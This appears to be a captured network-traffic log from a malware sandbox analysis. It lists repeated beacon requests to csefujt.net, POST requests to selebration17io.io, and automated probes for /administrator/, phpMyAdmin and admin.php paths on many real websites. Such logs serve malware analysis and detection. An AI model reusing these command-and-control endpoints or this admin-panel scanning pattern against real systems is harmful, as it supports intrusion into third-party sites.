                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qpvffufpuvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: selebration17io.io
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://porpskhbqsfeiw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: selebration17io.io
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: es-la.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ucivirtual.uci.edu.mx/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ag.ufa9999.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://naukrigulf.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: casinocontroller.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kwyk.frAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=043e21066f59341f79d55d583419ce99User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pt.secure.imvu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://secure.vexcorp.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipCookie: PANPSC=; BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pan.baidu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: connect.appen.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: opsu.terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
